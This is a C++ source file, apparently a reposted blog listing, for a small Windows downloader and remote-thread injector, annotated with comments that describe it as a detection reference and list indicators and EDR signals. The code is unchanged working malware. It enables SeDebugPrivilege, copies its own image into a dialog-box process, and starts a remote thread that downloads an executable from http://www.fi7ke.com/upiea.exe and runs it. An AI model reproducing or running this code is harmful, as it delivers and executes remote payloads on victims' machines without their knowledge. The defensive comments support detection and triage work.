VC++1.5K字节实现下载并远程注入


 

 

 

// Windows downloader / remote-thread injector sample (reposted blog listing).
// Kept here as a detection and triage reference; the three functions below are
// annotated from a defender's point of view, code unchanged.
//
// Linker directives worth noting as static indicators: a fixed preferred image
// base (/BASE), a non-standard entry point (/ENTRY:InjectPro, so no CRT
// startup), file alignment 0x200, and .data/.rdata merged into a single .text
// section that is marked executable+writable+readable (/SECTION:.text,EWR).
// A binary whose only section is RWX and whose entry symbol is not a CRT
// entry is an easy YARA/PE-heuristic hit.
#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "urlmon.lib")   // URLDownloadToFile lives in urlmon
#include <windows.h>

// Payload routine. It is never called directly in this image; InjectPro hands
// its address to CreateRemoteThread, so it runs inside the target process
// (the image is copied there at the same address, see InjectPro).
// Behaviour visible in the code: fetch the remote file to C:/upiea.exe, run
// it with WinExec, then end the remote thread.
// IoCs on this page: the download URL and the drop path "C:/upiea.exe".
// Detection: a GUI process importing/calling URLDownloadToFile and WinExec
// from a thread whose start address is outside any loaded module.
void InjectMemo()
{
    URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);
    WinExec("c:/upiea.exe", SW_SHOW);
    ExitThread(0);
}

// Enables SeDebugPrivilege on the current process token.
// Presumably done so that OpenProcess(PROCESS_ALL_ACCESS) below succeeds on
// a process the caller would otherwise not have full access to — inferred,
// the code itself only adjusts the token. No return value is checked, and
// the rest of the Ttges structure is left uninitialised; only Privileges[0]
// and PrivilegeCount are set. ReGvl receives the "previous state" length
// AdjustTokenPrivileges writes back.
// Detection: token-privilege adjustment enabling SeDebugPrivilege is
// auditable (Windows "token right adjusted" auditing) and is a common
// precursor to cross-process memory writes.
void GetDebugPrivs()
{
    HANDLE hToken;
    DWORD ReGvl;
    TOKEN_PRIVILEGES Ttges;

    if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        LookupPrivilegeValue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);
        Ttges.PrivilegeCount=1;
        Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);
    }
}

// Process entry point (per /ENTRY above). Sequence as written:
//   1. take the base address of this image and read SizeOfImage from its own
//      PE optional header;
//   2. enable SeDebugPrivilege;
//   3. find the first top-level window of class "#32770" (the standard
//      dialog-box class) and resolve its owning PID;
//   4. open that process with PROCESS_ALL_ACCESS;
//   5. release whatever the target has mapped at this image's base address,
//      then allocate an RWX region there and copy this whole image into it
//      (same address in both processes, which is what the fixed /BASE is for;
//      the image is used as position-dependent, unrelocated code);
//   6. start a remote thread at InjectMemo, passing the image base as the
//      thread parameter.
// Returning from the entry point then ends this process's only thread.
// Nothing is checked: FindWindow may return NULL (PID then comes from the
// desktop/whatever GetWindowThreadProcessId reports), OpenProcess,
// VirtualAllocEx and WriteProcessMemory may fail, and the code proceeds
// regardless.
// Detection / forensics: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx
// (PAGE_EXECUTE_READWRITE) -> WriteProcessMemory -> CreateRemoteThread is the
// canonical remote-thread injection chain (Sysmon Event ID 8, most EDR
// injection rules). In memory, the victim dialog process gains a private
// RWX region holding a full PE image (MZ/PE headers intact) that is not in
// the loader's module list, and a thread whose start address falls inside it.
void InjectPro()
{
    DWORD Size,PID;
    PBYTE module;
    module = (PBYTE)GetModuleHandle(0);
    Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
    HANDLE ProcessHandle;
    LPVOID heart;
    GetDebugPrivs();
    GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    // Frees the target's region at this image's base so the allocation at
    // the same address below can succeed (intent inferred from the address
    // reuse; the call itself has no effect if nothing is mapped there).
    VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
    heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);
    CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);
}


 
